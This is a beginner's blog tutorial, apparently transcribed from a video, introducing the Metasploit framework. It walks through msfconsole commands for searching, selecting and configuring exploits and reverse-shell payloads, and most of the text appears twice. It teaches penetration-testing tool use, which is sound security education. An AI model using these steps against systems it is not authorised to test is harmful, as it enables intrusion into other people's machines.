Complete Metasploit guide ( Part 1- Introduction and preparation of exploits and payloads)
This Complete Guide of Metasploit-Framework will help you in penetration testing and bug-bounty,
let's familiarize ourselves with the Metasploit framework.
Now the Metasploit framework is basically a tool and it comes pre-installed in Kali Linux. It is used for exploitation most of the time. Sometimes you can use it for scanning. Now there are some of the modules, and payloads, and nops and all the other stuff that we will talk about that come already with the Metasploit framework.
But before we begin using them, let's try to actually make them understandable. And after that, we will execute our first exploit.
So as I said, the Metasploit framework is a tool for developing and executing code against a remote target machine. Basically, for Metasploit, you actually have the MSF payload creator. We have the Metasploit framework which is the tool that we will use. You can start it up with a simple command called msfconsole.
Now the main two things that you will hear most of the time while we are in this section are exploits and payload. Now I already believe that most of you know what those two are. But just in case the exploit is the main action type of the attack. For example, if we have on a target vulnerable software running we can take advantage of it and exploit it. And run our reverse shell or rootkit on it.
for example. Now I'll explain what reverse shells and rootkits are. But basically the exploitation process, there is something that you should know, a term, it's called a zero-day. Now a zero-day for the exploitation is basically an exploit for a vulnerable system that hasn't been discovered previously. That's why it's called zero-days, it hasn't been fixed yet. It's still vulnerable, there is still vulnerable software out there. Now those are types of the attack that you will not encounter the most likely since discovering zero-days only happens a few times during the year. There are different types of zero-day. Some can be more dangerous than others.
one of the Zero Day found in 2017. An exploit that basically allowed anyone to access a Windows 7 machine, and I think also think a Windows 8 machine, without the user clicking on anything. So you could just connect to the same network and basically exploit the Windows 7 machine if it is running a 445 open port or SMB open port. It was discovered by some hackers, it was an NSA exploit called the Eternal Blue.
I will also show it to you in the Metasploit framework later on, but that is the basic meaning behind the zero-day attack. Now we will not be discovering zero-days attacks because most of those attacks if ever discovered, can be costly. They can cost from above $100,000. So if you were too. for example. discover a zero-day. you can sell it for one hundred thousand dollars or more. I believe for the iPhone, if you were to find for the iPhone a zero-day, you would get paid by Apple thousands of dollars!
We will be exploiting targets with already known exploits and with our reverse shells that we will run on the target. So there is something called payload which is basically the reverse shell. So that is something that after we exploit the vulnerable software we deliver its payload. Now we can deliver it to the machine in order for it to give us success or some information back. Now we will cover all of them in detail in the next Articles, but for now, let us actually start up the Metasploit framework and see the environment.
If Metasploit is not installed in your Linux system then use a command
apt install metasploit-framework
Now I would advise you before you actually type msfconsole which is the command for starting up the Metasploit framework. let's run these service PostgreSQL start. So
service postgresql start
This will make your Metasploit run faster since it is using the database. Now you do not need to do this if you don't want to, but as I said it will only make your Metasploit run faster. So now that we run this we can finally open our Metasploit framework. In order to do that you just need to type
msfconsole
Click enter and wait for this to open. Now since this is a virtual machine this might take a few seconds to open depending on your P.C. speed. And once it does we will actually cover some of the most basic commands that you will use in order to navigate to the Metasploit framework.
The first thing you notice is this banner right there. it is most of the time different, they change many times. The next thing you see is the available things on the Metasploit framework currently at this time, which is July 2020.
We have 2004 available exploits. We have 1049 auxiliary modules. Post exploitation modules 343, 562 payloads, 45 encoders, 10 nops, 7 evasion.
Now we will cover what all of these are in the next articles, but from now on let us actually see how we can navigate through this framework.
Now as we can see our command line is right here,
msf5 >
and here we type our commands. So the first logical thing that we should do is type
help
Now help will give us the available commands that we can run right now. So we can see some of the useful ones would be to use command. You will be going to use it a lot.
It's basically you just type here use and then the name of the actual exploit that you want to use. Selects a module by name. But in order for you to select the module, you need to know its name.
So since we are beginners we do not know the name of any module. So we can also use the search command in order to find out the modules,
search modules names, and descriptions. If you just type here search and let's say we want to find Windows exploits. So just type here
search windows
It will give you all of the available windows exploits and payloads on the Metasploit framework.
So these are all of the available modules available for Windows exploits. As we can see for example payload Windows reverse TCP query, and you can also select that and see more details about it.
this command shows all exploits, payloads, and post related to windows but if you want to just search for exploit search
search exploit/windows
Now there are lots of them. As I said there are over 1800 exploits in the Metasploit framework.
We will cover only a few of them since if we were to cover all of them we would make this course thousands of hours long.
Now let's say we want to use, for example, let's select random exploit. for understanding
So generic smb DLL injection.
So in order to pick that exploit we simply just type
use
and then paste the name of the exploit itself, and just press here enter. And you can see that you type the correct name for the exploit once there is red letters in these brackets. So it means this exploit exists.
Now this selected exploit we can see its options with the show command. So
show options
will give us all of the options for this exploit and what it requires in order to run.
sometimes required field so you need to specify if it is not specified. Description for that field, the local host to listen on. This must be an address on the local machine or 0.0.0.0.0. Now the server port is 445. The current setting is also a required field for the local port to listen on,
Now down here we want to see the exploit target. So in order to check out your available targets, you can just type
show targets
and it will print out a list of all of the targets available for this exploit. So we can see this exploit is for Windows x86 and Windows x64 So basically it can run on Windows platform.
If you didn't know much about this exploit you would want to find out more about it. You can do that with
show info
options. So this will print out what exactly is this exploit. So you just type here show info. It will say name, module, platform. It will basically give us the output of this command before. So available targets, check supported. Basic options are also something that we saw with the previous commands. Payload information and description. Now description is most likely something that you will find with this command.
You can see some of the other references right here. So if you were to copy this link, let us copy the link and open the link in the browser . And it will lead you to a page where you can read more about this exploit.
it should take us to a page where this exploit is in greater detail.
You can read it if you want to. You can also try to visit other sites as well that also explain this exploit in great detail.
Now if you want to deliver a payload with this exploit, you would see your available payloads with
show payload
So show payloads will give you your available payload for this exploit. So for example you cannot use our reverse TCP exploit payload in here since it is not specified in show payload options. You can only use all these other options available, or payloads available. In order, once you check out all of these payloads, and once you choose one, in order to set it you would have to type here
set payload (payload)
As we can see we successfully set the payload with this command. If you were to mistype it, it would say no such payload available. Now after we select payload you want to show options once again, and you will see that we also have some of the additional options for our payload. Now, most of the time you will see these two options one of them is LHOST, and LPORT. Now the LHOST is basically the listen address. So it is basically your Kali Linux machine since you are listening for the connection back from the target machine.
The out port is the listening port on which you're listening, which is most likely by default on Metasploit it is 4444.
for example. you can configure fields by command
set LHOST 192.168.1.5
And now you would be able to run this payload or exploit against your target if you find a vulnerable one. Now I will not be running this exploit since I don't really have a vulnerable target, but I just wanted to show you some of the commands that you will use in order to select your exploits. And we will actually exploit and run some scanners in the next sections right after we actually cover the basic structure of the Metasploit framework itself. I will explain what nops, encoders, payloads, exploits, post-exploitation tools
you can actually run the system commands from this command tool. So you can run all of the commands that you can run from a simple terminal in the Metasploit framework command line. So you can also run Nmap or netstat,
and you can also run anything from this command tool as well. So you do not need to call Metasploit while performing the attack or any other scan that you want to perform.
let's familiarize ourselves with the Metasploit framework.
What is the Metasploit Framework?
Now the Metasploit framework is basically a tool and it comes pre-installed in Kali Linux. It is used for exploitation most of the time. Sometimes you can use it for scanning. Now there are some of the modules, and payloads, and nops and all the other stuff that we will talk about that come already with the Metasploit framework.
But before we begin using them, let's try to actually make them understandable. And after that, we will execute our first exploit.
So as I said, the Metasploit framework is a tool for developing and executing code against a remote target machine. Basically, for Metasploit, you actually have the MSF payload creator. We have the Metasploit framework which is the tool that we will use. You can start it up with a simple command called msfconsole.
Now the main two things that you will hear most of the time while we are in this section are exploits and payload. Now I already believe that most of you know what those two are. But just in case the exploit is the main action type of the attack. For example, if we have on a target vulnerable software running we can take advantage of it and exploit it. And run our reverse shell or rootkit on it.
for example. Now I'll explain what reverse shells and rootkits are. But basically the exploitation process, there is something that you should know, a term, it's called a zero-day. Now a zero-day for the exploitation is basically an exploit for a vulnerable system that hasn't been discovered previously. That's why it's called zero-days, it hasn't been fixed yet. It's still vulnerable, there is still vulnerable software out there. Now those are types of the attack that you will not encounter the most likely since discovering zero-days only happens a few times during the year. There are different types of zero-day. Some can be more dangerous than others.
one of the Zero Day found in 2017. An exploit that basically allowed anyone to access a Windows 7 machine, and I think also think a Windows 8 machine, without the user clicking on anything. So you could just connect to the same network and basically exploit the Windows 7 machine if it is running a 445 open port or SMB open port. It was discovered by some hackers, it was an NSA exploit called the Eternal Blue.
I will also show it to you in the Metasploit framework later on, but that is the basic meaning behind the zero-day attack. Now we will not be discovering zero-days attacks because most of those attacks if ever discovered, can be costly. They can cost from above $100,000. So if you were too. for example. discover a zero-day. you can sell it for one hundred thousand dollars or more. I believe for the iPhone, if you were to find for the iPhone a zero-day, you would get paid by Apple thousands of dollars!
We will be exploiting targets with already known exploits and with our reverse shells that we will run on the target. So there is something called payload which is basically the reverse shell. So that is something that after we exploit the vulnerable software we deliver its payload. Now we can deliver it to the machine in order for it to give us success or some information back. Now we will cover all of them in detail in the next Articles, but for now, let us actually start up the Metasploit framework and see the environment.
- Installing Metasploit-Framework
If Metasploit is not installed in your Linux system then use a command
apt install metasploit-framework
Now I would advise you before you actually type msfconsole which is the command for starting up the Metasploit framework. let's run these service PostgreSQL start. So
service postgresql start
This will make your Metasploit run faster since it is using the database. Now you do not need to do this if you don't want to, but as I said it will only make your Metasploit run faster. So now that we run this we can finally open our Metasploit framework. In order to do that you just need to type
msfconsole
Click enter and wait for this to open. Now since this is a virtual machine this might take a few seconds to open depending on your P.C. speed. And once it does we will actually cover some of the most basic commands that you will use in order to navigate to the Metasploit framework.
The first thing you notice is this banner right there. it is most of the time different, they change many times. The next thing you see is the available things on the Metasploit framework currently at this time, which is July 2020.
We have 2004 available exploits. We have 1049 auxiliary modules. Post exploitation modules 343, 562 payloads, 45 encoders, 10 nops, 7 evasion.
Now we will cover what all of these are in the next articles, but from now on let us actually see how we can navigate through this framework.
Now as we can see our command line is right here,
msf5 >
and here we type our commands. So the first logical thing that we should do is type
help
Now help will give us the available commands that we can run right now. So we can see some of the useful ones would be to use command. You will be going to use it a lot.
It's basically you just type here use and then the name of the actual exploit that you want to use. Selects a module by name. But in order for you to select the module, you need to know its name.
So since we are beginners we do not know the name of any module. So we can also use the search command in order to find out the modules,
- Search modules in Metasploit
search modules names, and descriptions. If you just type here search and let's say we want to find Windows exploits. So just type here
search windows
It will give you all of the available windows exploits and payloads on the Metasploit framework.
So these are all of the available modules available for Windows exploits. As we can see for example payload Windows reverse TCP query, and you can also select that and see more details about it.
this command shows all exploits, payloads, and post related to windows but if you want to just search for exploit search
search exploit/windows
Now there are lots of them. As I said there are over 1800 exploits in the Metasploit framework.
We will cover only a few of them since if we were to cover all of them we would make this course thousands of hours long.
- Options of exploits in Metasploit
Now let's say we want to use, for example, let's select random exploit. for understanding
So generic smb DLL injection.
So in order to pick that exploit we simply just type
use
and then paste the name of the exploit itself, and just press here enter. And you can see that you type the correct name for the exploit once there is red letters in these brackets. So it means this exploit exists.
Now this selected exploit we can see its options with the show command. So
show options
will give us all of the options for this exploit and what it requires in order to run.
sometimes required field so you need to specify if it is not specified. Description for that field, the local host to listen on. This must be an address on the local machine or 0.0.0.0.0. Now the server port is 445. The current setting is also a required field for the local port to listen on,
Now down here we want to see the exploit target. So in order to check out your available targets, you can just type
show targets
and it will print out a list of all of the targets available for this exploit. So we can see this exploit is for Windows x86 and Windows x64 So basically it can run on Windows platform.
- All Information about the exploit in Metasploit
If you didn't know much about this exploit you would want to find out more about it. You can do that with
show info
options. So this will print out what exactly is this exploit. So you just type here show info. It will say name, module, platform. It will basically give us the output of this command before. So available targets, check supported. Basic options are also something that we saw with the previous commands. Payload information and description. Now description is most likely something that you will find with this command.
You can see some of the other references right here. So if you were to copy this link, let us copy the link and open the link in the browser . And it will lead you to a page where you can read more about this exploit.
it should take us to a page where this exploit is in greater detail.
You can read it if you want to. You can also try to visit other sites as well that also explain this exploit in great detail.
- Payloads for exploits in Metasploit
Now if you want to deliver a payload with this exploit, you would see your available payloads with
show payload
So show payloads will give you your available payload for this exploit. So for example you cannot use our reverse TCP exploit payload in here since it is not specified in show payload options. You can only use all these other options available, or payloads available. In order, once you check out all of these payloads, and once you choose one, in order to set it you would have to type here
set payload (payload)
As we can see we successfully set the payload with this command. If you were to mistype it, it would say no such payload available. Now after we select payload you want to show options once again, and you will see that we also have some of the additional options for our payload. Now, most of the time you will see these two options one of them is LHOST, and LPORT. Now the LHOST is basically the listen address. So it is basically your Kali Linux machine since you are listening for the connection back from the target machine.
The out port is the listening port on which you're listening, which is most likely by default on Metasploit it is 4444.
for example. you can configure fields by command
set LHOST 192.168.1.5
And now you would be able to run this payload or exploit against your target if you find a vulnerable one. Now I will not be running this exploit since I don't really have a vulnerable target, but I just wanted to show you some of the commands that you will use in order to select your exploits. And we will actually exploit and run some scanners in the next sections right after we actually cover the basic structure of the Metasploit framework itself. I will explain what nops, encoders, payloads, exploits, post-exploitation tools
you can actually run the system commands from this command tool. So you can run all of the commands that you can run from a simple terminal in the Metasploit framework command line. So you can also run Nmap or netstat,
and you can also run anything from this command tool as well. So you do not need to call Metasploit while performing the attack or any other scan that you want to perform.
Check Out the Metasploit Series
Part 2 - Understanding All Metasploit Modules
Part 4 - Brute Forcing Tomcat With MSF Auxiliary
Part 5 -OS Command Injection
Other Cool Hacking Stuff
